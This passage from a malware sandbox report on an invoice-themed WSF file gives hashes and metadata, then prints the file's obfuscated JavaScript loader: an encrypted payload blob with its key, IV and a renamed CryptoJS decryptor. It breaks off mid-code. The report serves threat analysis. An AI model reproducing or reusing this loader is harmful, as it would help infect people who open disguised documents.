File name: | Copy of Docs 68_204 INVO.WSF |
Full analysis: | https://app.any.run/tasks/703e4fe7-a2f6-4e5d-b365-6b6f562daddc |
Verdict: | Malicious activity |
Analysis date: | January 18, 2020, 10:42:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with no line terminators |
MD5: | 6E67786F68931599C4667F2CFEA164B9 |
SHA1: | 9707EF2E939B8EDC87D33B0D416EDFB0F6AA70F3 |
SHA256: | 0444FF998B75D9D53A5879087BAF542415D22271801A67B9F1D5BB851620E7BB |
SSDEEP: | 384:U1R5TB/kHcTbgdM0moo8WE6JH+xxKqnDmrWA2juutIm6m4:oiHwgS0mooHEPPNZAUuu0 |
.xml | | | Generic XML (ASCII) (100) |
---|
PackageJobScriptLanguage: | JavaScript |
---|---|
PackageJobScript: | var dtEDoFVfAj={eMUXrzTNkg:function(r){var a=NKBCmUHGeG.eazSwMHLnL.bOuFgvcTJj.xrkoWLGoQF({ukAoslEzPa:NKBCmUHGeG.VmLLEtCkRa.qdaKtPbCGD.eMUXrzTNkg("hXrI6VHc1882GaQ1AuutGmhjD5uM0PJiojBtfmfm and l0o784XktSXA4ufoMIOcfhacZ6B and 43ZP2g7i9omx9jRoxkaz3 are dSBNiJzm and dGnZI2r53FQQKnVV9JrIg4y are YHpuvZj5PGIf60zbJulqkLTkXa0Pi0g7f are zxB7TadXzr5z are niyD and Jd are SSiyKH2Y8M651YAdyRQ are SS7BkvzQY are G58nkmR are dRTGI15uZRkrDGJRKQbgxzG769QTL and A3awUdbMM92WCAVsvs1wfbJSkeNQpIaRHfQ479NujDAZKphWRO1cBULK73MONz are QztuL4InpAGRoAuuQ and 7W are are JKc1AwSwWB and JsLXxscVU6I6sDdvXWEpdER3yT9rn56VPTP37UC9Cfnfp9 and MC are QhXwArcEsxD1Xciv0T are 4CO and A1Mkkz1X8ccgdphF49tmsNm5vwP and F0RDAtlxs2PiY6H48ByJL5JFxsWFrXYzvPKGnUfLBffqm8ls3ZF5eljwVMB are bdql1i4f1hKV2OHqbxUA2CX5lKknoW4KdiftLHQZj2G2VTIyICK26i8Z and PJP1nmWw and T3D1gW and q7ycOz1mkI3 and F5zzLDc5EKgm3 and WoOaSei0KmzUpta6ldqoMx are d are D9 are nxlhHEHMewhYHlIw31WBUoDceiK8s413 and ccjnnpWtY6xleiMDJf8ovDhtjJyke3a1HNQYk0V8EjmfjHf are dzdcVxCB1QtVwiRvZvlCkMbLSt38Wwl4u are CRVMePBkVTXZ5s69 are vds4LTA0Aw4oVbNGBfZVqVo4wSwGyhSBoJEPm7255WpszOJ7SHBL9wZUCcYQzmLZpCDaNPTZLWAxa12OvEq2s11GcBIY28ttIHCSLdPhXEaGZZCiqM3XqbxQFkwAo are VD are jGTPtbjiDQGL and ZOqqPqzrGQGMFMwgVP are Avh and HekAaeWy1oq13PeM4sAyPovc4EPmhWErfVLSI2c8rilBAo9YeyGDwkAORVUGGe2UlUok are 2cAtJddwiW9tzIFWUu4t3gDUSWKjBDXwAJfcdbOVYDWj and KLNaPOx are lwJuy3UY9epmM1IfHbw59iibQZUYCHrJ5uWJAXhOWEtYtcJY1tf are qKR1aHaBapaX2umb0M6IXEPH2RFMmwcnuqC4Pu4owez25O8BZw5YCyq0pJSTH and t are k9aZonogWXx160PGgxC are ZjWCTjT8w5MBYf6Q6KHDrSQXwSLWvkCO9h5LuzZ1l4hOyoQ3k4IAcZ0p2acc4 and TJpShsBKIyXRo3vHmZJgZusOKnjMp5KnRiV977EpWu5DO04U and 7zWLYVPzGNm9cfsVrjpdXz6Skh4kJZ1a2hWbsQlFudse6x9t0KBd4PGcm4yri7IthM are CjBtJRCW3d0CmYoi8zhX are vszXndxds5 and UitIjtz57cEWJeYvOD and UaO1xfj and csD77yvaVDl5Bmai and 1J4YcQHmWHp0uzJxaV9i4ynKSWfdtW are 9yfSJhXpL are DRgYoC8yxRnqjqzqWCisyEULaImc9RkGg6mmReVEj2AbCTxcTostc are gBm are gsDWmpizifhK9WvSGbI7eTCoZ and S5OXEU3W9V1jnEUYCk4qVP3QuxAS70YZwbovrSkn0 and XARuvNTCbHpnhCD8hw7RYq552EpZCp3rQGyVlFfxc257U7rHF0PTqMOd are 5DwPkabGT and VgW and xncxz21Cj7wVHC73vlzqvV are PI1kGlPT are HaFaFLV4qutNvtielCQkZbGuFRBAXxA1Z3A1u2tuYrpCtISB68j2TtbFbxQnzGvr are vEKW are ejhfUcZ1CsRZRAmYAWl0dcYPsp8XKAhNZWJ are gzZPAjyxcL3nriE97oNhod4aOdNbTfNUKe3CphYnsdGdbGuWj0ruWVOh5egU8GL and MNdelWRFC0PczuJ9OFKpFyYDTbuvCwTEZLXb3ltKNU9mh4AHeuZb7vO6XOfevqnEgVNcWBmwgM1JDEnb and atz96zBvtYwKVTCcDTndnKayXO and lc82uRCy4lNm6YagZ9AsgsPdq1eqBIpxIQ8juHCVivA5PHtP2tidi and S3ezdj37qnjwqOrwnVTzNvZwvl4DL3B6yeepbyqD and p7grOkWHAS7mhC and eeDv895PEt6FGMntgKvjlbwBa423LLmDv74Ix7NRcCct68SGfkChXKoYck3dMozwB8Ss3fJ2FmhaiO5GttqihfWq9NR3SRusXCAiSh5uK3okEXrtmm04ZUH8ldOTKd28EkhPvSmg7r are lBCPKt6O and k5mgs4eiqeVb0KxeFczXBCRi89CPNutFH1yK86 are H0bdXyKZoIXtbec4evOybGVqh028kw5nxrxIUcLVweByg are VN12HhUOR5cqaU0VdQRKFEZ are 7mlIAxdxywORzGlC4GLaC4ikdpMQa23 and 6vKXaZF24NqKEJ1VdKK6medjdeaqjcZkjOr7oVf4V6OocG1WIpevZMJvWX5ZsEJd94ZviwVKOvqLUocAtmBaZeO5rQM1TtLz4wG and t and vIRJkjxaja2dDQ5KyhWKlDo3TbdhZ7AT0NnZF0FPnq3RcgUvAUrzvuRuvJKBVZ6v2h are b21OGY and yLWLxIi9Ka5S9oOt and and dkZQZmNcoFM4BuGaPS3efXa6PEGd0jGjZKF5TDOMO1dePbDtoGkdy8Z6tfzuGIC3SH9hl7EbcTSAkvns7d3jcru8 and igPxkapNqIr2s7Qv3Qt8hpJeMBwx1ILC1I are rC7fjBR1wYv7lsBJov8kL03A5jDoyZvEouf2V and fzHMLXmAuGb and R6MnuyUUBOppM36jESTcfPNYjx and NlidUMIn8ijozFytVfkt4wAsq90MbAlcso2y9D are EpiArc2N708N14qL5 are pPRCJb6UpRUJn1MI38DE1hjgzWlIeyvcPwvTWbqGubBJP6DIQJ9Avy are nvijYBfPAuXIkH4IS and 0yPyFcdt are fswfPqt2E4DKqhCm5kNVMF4BThsNauwzeSS2lxEr and PWu7MvY9M3wuGvj3EW0yZq5CM3Gm6R7gl9 are bST are IyhGwDM4bqFN0bqGgeqlgJzQqFFPA and wnQ1Km0EFUYW0biVj4anSrDd3JWtJ are and NZcCeL5MXfHX8lBEQLquksAq and fBxCBoGht11mZN4sJX5o9CTROWZLgH67WxukBYJeykngNcO1rpRSFsJ5w2Zw5GK8nfLKF3tdzig3X7HMPdbgx75azouagQmGcHaE are QItF0z2JYxfOjdhQPmElhBsdXtTxfplPb8Cts02gafq7KExoSPK991ca1LVwKnqY8hSRL7Ox are EmO2c1epWsKEoj6DcA are 3jZ0GOmDRGSWZLXJWu4ytMXc5itOKFpfwzUlGuHKdDx are YDfz3gDfhgp3jYZlatnlzYtvm1DTw43dLHx2UAxm8CCE1Ek1vUExdKtjQrIM2BWjjzd0Mw81CxLr4zjsGjv4axtCU22jWCM1PfWPygVzx02zxEewGzmz7E0qbeQm6CQrn337r279rPhBYd0i1uX1ewzKJOEuETA3pPBIw2gJyHneZ3qSUOydPRCDtQ3E59idpW and XYO9LskAb8GIRBfRfFCmxrn1yTODUyoNiFE01 are MiFbaXzmJlQxHwmhE9UbAMx are BNF0c1yEPphQu39labdWbf5WoswYtqvwOQlEUxugSXDIh3McCOgD3hALEgrJZ9nrM01oOxnw88cA31LZpkmeDjYCMR and XOzWLRQ6fXReP and wZ4u are and ps7GYfltz2kiEmfq2zzg2bNsH and Mwa7tnyNrKK9Pqc are bsQyqg3H3AAEB6AtGfk1 are vnI3dDrlxEI89T3fgpH4cEmym0rEFPSF77bNk9 are yjNRoc0PlD8Y28T8sxkYhmOMVPm5BgVk6hYKYkhARJYNJ0mGGwOdDsqJ1 and P8CyHDuRehNfZWsGzG and Eqr8Hy4fZMfqt are jUr7lyxbEfVpbJFVLgrOZbnec are hZ and adj6XSZs3Lupb7bTcZYTlfL8yD6SBSUD1mf8ILWoZz7Wl and MCPLMzsHuK4C5sV1IYWES76atP5dzfbREIMPZc6ZBce3Eud4MQdxuZ789BVn0q5YCfLybs are p0sDE31PLbROC25LBlIZaJGNacqL9A0Nb2iyEWTmwrxclBOrMwMnISCh2WVQ3foO4q1mRqQ0l6HrhYLe5oVnqb7aVTt7jNWHYbgqAgNdG6mrACztTrNzonc65poVjP5mj7B4vmLT are qZinSukistDRUngoi4eGrVRKOxlB92jJjeRBw14btD1WM are Xl0u3wsVONebFdGBJ6Chro60Ynoc are BarDNsIPtNiP4MJE0TsxINOpoI9ZYbgjgI2PfDsrPyEibFAQxRnWrR7EIeb and Le5S45ic948npMHeHwbVC7ZIogPSRYm are 5o0crU5Zg2EK2XzN5NzfjWyKOvzzaGwqMGJjo5GkpuhGpHjR0zuaXW are 6A3J3tUKDSG9 are 2 and 870Ycg9ghgVBgWCJBFYuAN74BJgZEVk4Db3jUUhz4vEkyCIR6dEjaCXpNa1kugicsogD4U2Qu49SnrsAUKbpyshyBIm6kc2r4dU4SxQAwFBuRinrqUMbgYFAm8leGfi6O3StOy84czlNpyGxzQByMLwYIRhp6tb0OY9oBbdOQS and 8i4G and v70kkWCBDqRsmBFIz4iVe5HcwAaabiU6Fl8RKlJvGUfiv3zStwFqXvctpcq63cfgCbYpQJuU and eoTTdl and DuKNrQkm9zD0zxBpB18eLeQnIKA are and tFmMIiID6JPtEeJQPlfcIj5z1CvBS794ssrrTng97G and BYMQMF5Atblixch9pQPNxyVKqBt4q8TPEZo and YXwN7M6L70O8UarPXLue8JurQ7U9ccn5 and pZT and 2rx6tdVG0oqo1zhAfVexenrWasd9hhPnTyKEbc1TDXVboJCs5VbRxbOTIO45UDtz are 97 and Fs95mp9OwL6wTebE0P8 and L2vVnjWftpBmNIc1pFZGNrAgBmAZL7qpayzF6sS34rqJenJnyVigYTcgbbqMtjs1TZWzIsoniMXuCBs9sH2R5YE0O8B0t8zEu27hmF are BdgTEWs3ufga2PmeuGZBJvt1pPVjdkHUZ56TiRBjTzhic are Mv5WmwjBogQ4Gi and kRCYULmBRnZ and aSSXbXA9T9B0NfgU2VFMJWbFFAwhonZL9J34K0btsmR are Seuv8 and I3J6oxsfyH3gX09fyaVzzktwVqUJWe4jesChFC5youtY6X and 7AHeHm87dHdWzVGJb52Kn2q1qi2jRQv74ggK84jfvd0batVJEIvwAyYnE0tWMdlgZj and 8HH3 and ziJOq4pYG".replace(/\sand\s/g,"+").replace(/\sare\s/g,"/"))});return a.yLIlTYUEdC=NKBCmUHGeG.VmLLEtCkRa.lDGQhhAcvH.eMUXrzTNkg("\x35\x36\x33\x66\x64\x62\x35\x37\x66\x65\x62\x61\x30\x38\x33\x39\x31\x37\x35\x65\x65\x31\x65\x62\x62\x33\x33\x64\x63\x34\x62\x65"),a.gwiUkDQFxZ=NKBCmUHGeG.VmLLEtCkRa.lDGQhhAcvH.eMUXrzTNkg("\x36\x30\x34\x37\x61\x37\x62\x38\x65\x32\x30\x66\x39\x37\x30\x37"),a}},NKBCmUHGeG=NKBCmUHGeG||function(s){function v(){}var r={},a=r.eazSwMHLnL={},t=a.PWMbKrXNBt={LBLCJIeRxa:function(r){v.prototype=this;var a=new v;return r&&a.GYRmHplwNA(r),a.hasOwnProperty("VTADyRvtZq")||(a.VTADyRvtZq=function(){a.$super.VTADyRvtZq.apply(this,arguments)}),(a.VTADyRvtZq.prototype=a).$super=this,a},xrkoWLGoQF:function(){var r=this.LBLCJIeRxa();return r.VTADyRvtZq.apply(r,arguments),r},VTADyRvtZq:function(){},GYRmHplwNA:function(r){for(var a in r)r.hasOwnProperty(a)&&(this[a]=r[a]);r.hasOwnProperty("toString")&&(this.toString=r.toString)},CUrjqyrzhF:function(){return this.VTADyRvtZq.prototype.LBLCJIeRxa(this)}},u=a.KVwhYRmAAZ=t.LBLCJIeRxa({VTADyRvtZq:function(r,a){r=this.eZRNeHSVmZ=r||[],this.KlwuiHJXBf=null!=a?a:4*r.length},toString:function(r){return(r||i).BmCiUFCvRY(this)},SYgJPZTcjh:function(r){var a=this.eZRNeHSVmZ,v=r.eZRNeHSVmZ,t=this.KlwuiHJXBf;if(r=r.KlwuiHJXBf,this.PFqgzhjvEl(),t%4)for(var n=0;n<r;n++)a[t+n>>>2]|=(v[n>>>2]>>>24-n%4*8&255)<<24-(t+n)%4*8;else if(65535<v.length)for(n=0;n<r;n+=4)a[t+n>>>2]=v[n>>>2];else a.push.apply(a,v);return this.KlwuiHJXBf+=r,this},PFqgzhjvEl:function(){var r=this.eZRNeHSVmZ,a=this.KlwuiHJXBf;r[a>>>2]&=4294967295<<32-a%4*8,r.length=s.ceil(a/4)},CUrjqyrzhF:function(){var r=t.CUrjqyrzhF.call(this);return r.eZRNeHSVmZ=this.eZRNeHSVmZ.slice(0),r},CqlccWGqHP:function(r){for(var a=[],v=0;v<r;v+=4)a.push(4294967296*s.CqlccWGqHP()|0);return new u.VTADyRvtZq(a,r)}}),n=r.VmLLEtCkRa={},i=n.lDGQhhAcvH={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ;r=r.KlwuiHJXBf;for(var v=[],t=0;t<r;t++){var n=a[t>>>2]>>>24-t%4*8&255;v.push((n>>>4).toString(16)),v.push((15&n).toString(16))}return v.join("")},eMUXrzTNkg:function(r){for(var a=r.length,v=[],t=0;t<a;t+=2)v[t>>>3]|=parseInt(r.substr(t,2),16)<<24-t%8*4;return new u.VTADyRvtZq(v,a/2)}},o=n.WfDUQhNjUK={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ;r=r.KlwuiHJXBf;for(var v=[],t=0;t<r;t++)v.push(String.fromCharCode(a[t>>>2]>>>24-t%4*8&255));return v.join("")},eMUXrzTNkg:function(r){for(var a=r.length,v=[],t=0;t<a;t++)v[t>>>2]|=(255&r.charCodeAt(t))<<24-t%4*8;return new u.VTADyRvtZq(v,a)}},h=n.IBEHHawlRa={BmCiUFCvRY:function(r){try{return decodeURIComponent(escape(o.BmCiUFCvRY(r)))}catch(r){throw Error("Malformed UTF-8 data")}},eMUXrzTNkg:function(r){return o.eMUXrzTNkg(unescape(encodeURIComponent(r)))}},e=a.UlEVySMEJs=t.LBLCJIeRxa({FHfjEzPpJw:function(){this.vIeNauyfgj=new u.VTADyRvtZq,this.GESeKdKkDW=0},gyZqefjfbb:function(r){"string"==typeof r&&(r=h.eMUXrzTNkg(r)),this.vIeNauyfgj.SYgJPZTcjh(r),this.GESeKdKkDW+=r.KlwuiHJXBf},RKIgZniAQd:function(r){var a=this.vIeNauyfgj,v=a.eZRNeHSVmZ,t=a.KlwuiHJXBf,n=this.xWmTEJzxuk,i=t/(4*n);if(r=(i=r?s.ceil(i):s.max((0|i)-this.jreIRpNpkc,0))*n,t=s.min(4*r,t),r){for(var o=0;o<r;o+=n)this.UhGEEtisBv(v,o);o=v.splice(0,r),a.KlwuiHJXBf-=t}return new u.VTADyRvtZq(o,t)},CUrjqyrzhF:function(){var r=t.CUrjqyrzhF.call(this);return r.vIeNauyfgj=this.vIeNauyfgj.CUrjqyrzhF(),r},jreIRpNpkc:0});a.bNRyvxysqf=e.LBLCJIeRxa({tAjRFOtDJa:t.LBLCJIeRxa(),VTADyRvtZq:function(r){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(r),this.FHfjEzPpJw()},FHfjEzPpJw:function(){e.FHfjEzPpJw.call(this),this.VDrUSIMlYF()},xizcXRaCSF:function(r){return this.gyZqefjfbb(r),this.RKIgZniAQd(),this},fZuooDWaQu:function(r){return r&&this.gyZqefjfbb(r),this.jnfmItvFqw()},xWmTEJzxuk:16,bvTMfLRMFS:function(v){return function(r,a){return new v.VTADyRvtZq(a).fZuooDWaQu(r)}},FdkaCDLqCX:function(v){return function(r,a){return new c.HMAC.VTADyRvtZq(v,a).fZuooDWaQu(r)}}});var c=r.RfuCsvEMIV={};return r}(Math);!function(){var r=NKBCmUHGeG,u=r.eazSwMHLnL.KVwhYRmAAZ;r.VmLLEtCkRa.qdaKtPbCGD={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ,v=r.KlwuiHJXBf,t=this.KraWJNWdbF;r.PFqgzhjvEl(),r=[];for(var n=0;n<v;n+=3)for(var i=(a[n>>>2]>>>24-n%4*8&255)<<16|(a[n+1>>>2]>>>24-(n+1)%4*8&255)<<8|a[n+2>>>2]>>>24-(n+2)%4*8&255,o=0;o<4&&n+.75*o<v;o++)r.push(t.charAt(i>>>6*(3-o)&63));if(a=t.charAt(64))for(;r.length%4;)r.push(a);return r.join("")},eMUXrzTNkg:function(r){var a=r.length,v=this.KraWJNWdbF;!(t=v.charAt(64))||-1!=(t=r.indexOf(t))&&(a=t);for(var t=[],n=0,i=0;i<a;i++)if(i%4){var o=v.indexOf(r.charAt(i-1))<<i%4*2,s=v.indexOf(r.charAt(i))>>>6-i%4*2;t[n>>>2]|=(o|s)<<24-n%4*8,n++}return u.xrkoWLGoQF(t,n)},KraWJNWdbF:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="}}(),function(i){function m(r,a,v,t,n,i,o){return((r=r+(a&v|~a&t)+n+o)<<i|r>>>32-i)+a}function A(r,a,v,t,n,i,o){return((r=r+(a&t|v&~t)+n+o)<<i|r>>>32-i)+a}function C(r,a,v,t,n,i,o){return((r=r+(a^v^t)+n+o)<<i|r>>>32-i)+a}function O(r,a,v,t,n,i,o){return((r=r+(v^(a|~t))+n+o)<<i|r>>>32-i)+a}for(var r=NKBCmUHGeG,a=(t=r.eazSwMHLnL).KVwhYRmAAZ,v=t.bNRyvxysqf,t=r.RfuCsvEMIV,M=[],n=0;n<64;n++)M[n]=4294967296*i.abs(i.sin(n+1))|0;t=t.lLteiQqIHF=v.LBLCJIeRxa({VDrUSIMlYF:function(){this.eSduUVnIBD=new a.VTADyRvtZq([1732584193,4023233417,2562383102,271733878])},UhGEEtisBv:function(r,a){for(var v=0;v<16;v++){var t=r[o=a+v];r[o]=16711935&(t<<8|t>>>24)|4278255360&(t<<24|t>>>8)}v=this.eSduUVnIBD.eZRNeHSVmZ;var n,i,o=r[a+0],s=(t=r[a+1],r[a+2]),u=r[a+3],h=r[a+4],e=r[a+5],c=r[a+6],f=r[a+7],l=r[a+8],p=r[a+9],g=r[a+10],d=r[a+11],k=r[a+12],y=r[a+13],w=r[a+14],S=r[a+15],_=v[0],B=O(B=O(B=O(B=O(B=C(B=C(B=C(B=C(B=A(B=A(B=A(B=A(B=m(B=m(B=m(B=m(B=v[1],i=m(i=v[2],n=m(n=v[3],_=m(_,B,i,n,o,7,M[0]),B,i,t,12,M[1]),_,B,s,17,M[2]),n,_,u,22,M[3]),i=m(i,n=m(n,_=m(_,B,i,n,h,7,M[4]),B,i,e,12,M[5]),_,B,c,17,M[6]),n,_,f,22,M[7]),i=m(i,n=m(n,_=m(_,B,i,n,l,7,M[8]),B,i,p,12,M[9]),_,B,g,17,M[10]),n,_,d,22,M[11]),i=m(i,n=m(n,_=m(_,B,i,n,k,7,M[12]),B,i,y,12,M[13]),_,B,w,17,M[14]),n,_,S,22,M[15]),i=A(i,n=A(n,_=A(_,B,i,n,t,5,M[16]),B,i,c,9,M[17]),_,B,d,14,M[18]),n,_,o,20,M[19]),i=A(i,n=A(n,_=A(_,B,i,n,e,5,M[20]),B,i,g,9,M[21]),_,B,S,14,M[22]),n,_,h,20,M[23]),i=A(i,n=A(n,_=A(_,B,i,n,p,5,M[24]),B,i,w,9,M[25]),_,B,u,14,M[26]),n,_,l,20,M[27]),i=A(i,n=A(n,_=A(_,B,i,n,y,5,M[28]),B,i,s,9,M[29]),_,B,f,14,M[30]),n,_,k,20,M[31]),i=C(i,n=C(n,_=C(_,B,i,n,e,4,M[32]),B,i,l,11,M[33]),_,B,d,16,M[34]),n,_,w,23,M[35]),i=C(i,n=C(n,_=C(_,B,i,n,t,4,M[36]),B,i,h,11,M[37]),_,B,f,16,M[38]),n,_,g,23,M[39]),i=C(i,n=C(n,_=C(_,B,i,n,y,4,M[40]),B,i,o,11,M[41]),_,B,u,16,M[42]),n,_,c,23,M[43]),i=C(i,n=C(n,_=C(_,B,i,n,p,4,M[44]),B,i,k,11,M[45]),_,B,S,16,M[46]),n,_,s,23,M[47]),i=O(i,n=O(n,_=O(_,B,i,n,o,6,M[48]),B,i,f,10,M[49]),_,B,w,15,M[50]),n,_,e,21,M[51]),i=O(i,n=O(n,_=O(_,B,i,n,k,6,M[52]),B,i,u,10,M[53]),_,B,g,15,M[54]),n,_,t,21,M[55]),i=O(i,n=O(n,_=O(_,B,i,n,l,6,M[56]),B,i,S,10,M[57]),_,B,c,15,M[58]),n,_,y,21,M[59]),i=O(i,n=O(n,_=O(_,B,i,n,h,6,M[60]),B,i,d,10,M[61]),_,B,s,15,M[62]),n,_,p,21,M[63]);v[0]=v[0]+_|0,v[1]=v[1]+B|0,v[2]=v[2]+i|0,v[3]=v[3]+n|0},jnfmItvFqw:function(){var r=this.vIeNauyfgj,a=r.eZRNeHSVmZ,v=8*this.GESeKdKkDW,t=8*r.KlwuiHJXBf;a[t>>>5]|=128<<24-t%32;var n=i.floor(v/4294967296);for(a[15+(t+64>>>9<<4)]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8),a[14+(t+64>>>9<<4)]=16711935&(v<<8|v>>>24)|4278255360&(v<<24|v>>>8),r.KlwuiHJXBf=4*(a.length+1),this.RKIgZniAQd(),a=(r=this.eSduUVnIBD).eZRNeHSVmZ,v=0;v<4;v++)t=a[v],a[v]=16711935&(t<<8|t>>>24)|4278255360&(t<<24|t>>>8);return r},CUrjqyrzhF:function(){var r=v.CUrjqyrzhF.call(this);return r.eSduUVnIBD=this.eSduUVnIBD.CUrjqyrzhF(),r}}),r.lLteiQqIHF=v.bvTMfLRMFS(t),r.HmaclLteiQqIHF=v.FdkaCDLqCX(t)}(Math),function(){var r,a=NKBCmUHGeG,v=(r=a.eazSwMHLnL).PWMbKrXNBt,h=r.KVwhYRmAAZ,t=(r=a.RfuCsvEMIV).clGbCUkVRF=v.LBLCJIeRxa({tAjRFOtDJa:v.LBLCJIeRxa({KzfiCbrnue:4,qwYZePKuGS:r.lLteiQqIHF,qqfapNqQKP:1}),VTADyRvtZq:function(r){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(r)},IOaZMzuUuc:function(r,a){for(var v=(o=this.tAjRFOtDJa).qwYZePKuGS.xrkoWLGoQF(),t=h.xrkoWLGoQF(),n=t.eZRNeHSVmZ,i=o.KzfiCbrnue,o=o.qqfapNqQKP;n.length<i;){s&&v.xizcXRaCSF(s);var s=v.xizcXRaCSF(r).fZuooDWaQu(a);v.FHfjEzPpJw();for(var u=1;u<o;u++)s=v.fZuooDWaQu(s),v.FHfjEzPpJw();t.SYgJPZTcjh(s)}return t.KlwuiHJXBf=4*i,t}});a.clGbCUkVRF=function(r,a,v){return t.xrkoWLGoQF(v).IOaZMzuUuc(r,a)}}(),NKBCmUHGeG.eazSwMHLnL.SQaxnzYskL||function(){var r=(f=NKBCmUHGeG).eazSwMHLnL,a=r.PWMbKrXNBt,o=r.KVwhYRmAAZ,v=r.UlEVySMEJs,t=f.VmLLEtCkRa.qdaKtPbCGD,n=f.RfuCsvEMIV.clGbCUkVRF,i=r.SQaxnzYskL=v.LBLCJIeRxa({tAjRFOtDJa:a.LBLCJIeRxa(),DFaQKSSpxd:function(r,a){return this.xrkoWLGoQF(this.XNQsMuyROa,r,a)},YTPIvGNUof:function(r,a){return this.xrkoWLGoQF(this.puxhpNLqoe,r,a)},VTADyRvtZq:function(r,a,v){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(v),this.hLGIpQMIyO=r,this.ujgXpnylwb=a,this.FHfjEzPpJw()},FHfjEzPpJw:function(){v.FHfjEzPpJw.call(this),this.VDrUSIMlYF()},BirFVFlKOB:function(r){return this.gyZqefjfbb(r),this.RKIgZniAQd()},fZuooDWaQu:function(r){return r&&this.gyZqefjfbb(r),this.jnfmItvFqw()},KzfiCbrnue:4,XRkvWggaQX:4,XNQsMuyROa:1,puxhpNLqoe:2,bvTMfLRMFS:function(t){return{PYbsXnmtJA:function(r,a,v){return("string"==typeof a?l:c).PYbsXnmtJA(t,r,a,v)},IXjSHElPSb:function(r,a,v){return("string"==typeof a?l:c).IXjSHElPSb(t,r,a,v)}}}});r.StreamSQaxnzYskL=i.LBLCJIeRxa({jnfmItvFqw:function(){return this.RKIgZniAQd(!0)},xWmTEJzxuk:1});function s(r,a,v){var t=this.bQaMMvenyc;t?this.bQaMMvenyc=void 0:t=this.MAJkuGovvM;for(var n=0;n<v;n++)r[a+n]^=t[n]}var u=f.jspwHIXzmY={},h=(r.BlockSQaxnzYskLMode=a.LBLCJIeRxa({DFaQKSSpxd:function(r,a){return this.vEQkSvUxdn.xrkoWLGoQF(r,a)},YTPIvGNUof:function(r,a){return this.PtyIomnbVQ.xrkoWLGoQF(r,a)},VTADyRvtZq:function(r,a){this.GITGGidlRh=r,this.bQaMMvenyc=a}})).LBLCJIeRxa();h.vEQkSvUxdn=h.LBLCJIeRxa({BirFVFlKOBBlock:function(r,a){var v=this.GITGGidlRh,t=v.xWmTEJzxuk;s.call(this,r,a,t),v.PYbsXnmtJABlock(r,a),this.MAJkuGovvM=r.slice(a,a+t)}}),h.PtyIomnbVQ=h.LBLCJIeRxa({BirFVFlKOBBlock:function(r,a){var v=this.GITGGidlRh,t=v.xWmTEJzxuk,n=r.slice(a,a+t);v.IXjSHElPSbBlock(r,a),s.call(this,r,a,t),this.MAJkuGovvM=n}}),u=u.HoghRMehux=h,h=(f.DNsMXJjxnO={}).Pkcs7={DNsMXJjxnO:function(r,a){for(var v,t=(v=(v=4*a)-r.KlwuiHJXBf%v)<<24|v<<16|v<<8|v,n=[],i=0;i<v;i+=4)n.push(t);v=o.xrkoWLGoQF(n,v),r.SYgJPZTcjh(v)},unDNsMXJjxnO:function(r){r.KlwuiHJXBf-=255&r.eZRNeHSVmZ[r.KlwuiHJXBf-1>>>2]}},r.BlockSQaxnzYskL=i.LBLCJIeRxa({tAjRFOtDJa:i.tAjRFOtDJa.LBLCJIeRxa({jspwHIXzmY:u,ovnGHahhRt:h}),FHfjEzPpJw:function(){i.FHfjEzPpJw.call(this);var r=(a=this.tAjRFOtDJa).yLIlTYUEdC,a=a.jspwHIXzmY;if(this.hLGIpQMIyO==this.XNQsMuyROa)var v=a.DFaQKSSpxd;else v=a.YTPIvGNUof,this.jreIRpNpkc=1;this._jspwHIXzmY=v.call(a,this,r&&r.eZRNeHSVmZ)},UhGEEtisBv:function(r,a){this._jspwHIXzmY.BirFVFlKOBBlock(r,a)},jnfmItvFqw:function(){var r=this.tAjRFOtDJa.ovnGHahhRt;if(this.hLGIpQMIyO==this.XNQsMuyROa){r.DNsMXJjxnO(this.vIeNauyfgj,this.xWmTEJzxuk);var a=this.RKIgZniAQd(!0)}else a=this.RKIgZniAQd(!0),r.unDNsMXJjxnO(a);return a},xWmTEJzxuk:4});var e=r.bOuFgvcTJj=a.LBLCJIeRxa({VTADyRvtZq:function(r){this.GYRmHplwNA(r)},toString:function(r){return(r||this.HCvDohrvxQ).BmCiUFCvRY(this)}}),c=(u=(f.XCoXBEMuLA={}).pMgBTzEVtE={BmCiUFCvRY:function(r){var a=r.ukAoslEzPa;return((r=r.gwiUkDQFxZ)?o.xrkoWLGoQF([1398893684,1701076831]).SYgJPZTcjh(r).SYgJPZTcjh(a):a).toString(t)},eMUXrzTNkg:function(r){var a=(r=t.eMUXrzTNkg(r)).eZRNeHSVmZ;if(1398893684==a[0]&&1701076831==a[1]){var v=o.xrkoWLGoQF(a.slice(2,4));a.splice(0,4),r.KlwuiHJXBf-=16}return e.xrkoWLGoQF({ukAoslEzPa:r,salt:v})}},r.SerializableSQaxnzYskL=a.LBLCJIeRxa({tAjRFOtDJa:a.LBLCJIeRxa({XCoXBEMuLA:u}),PYbsXnmtJA:function(r,a,v,t){t=this.tAjRFOtDJa.LBLCJIeRxa(t);var n=r.DFaQKSSpxd(v,t);return a=n.fZuooDWaQu(a),n=n.tAjRFOtDJa,e.xrkoWLGoQF({ukAoslEzPa:a,key:v,yLIlTYUEdC:n.yLIlTYUEdC,RfuCsvEMIVrithm:r,jspwHIXzmY:n.jspwHIXzmY,ovnGHahhRt:n.ovnGHahhRt,xWmTEJzxuk:r.xWmTEJzxuk,HCvDohrvxQ:t.XCoXBEMuLA})},IXjSHElPSb:function(r,a,v,t){return t=this.tAjRFOtDJa.LBLCJIeRxa(t),a=this._eMUXrzTNkg(a,t.XCoXBEMuLA),r.YTPIvGNUof(v,t).fZuooDWaQu(a.ukAoslEzPa)},_eMUXrzTNkg:function(r,a){return"string"==typeof r?a.eMUXrzTNkg(r,this):r}})),f=(f.kdf={}).pMgBTzEVtE={mxqauHfFCq:function(r,a,v,t){return 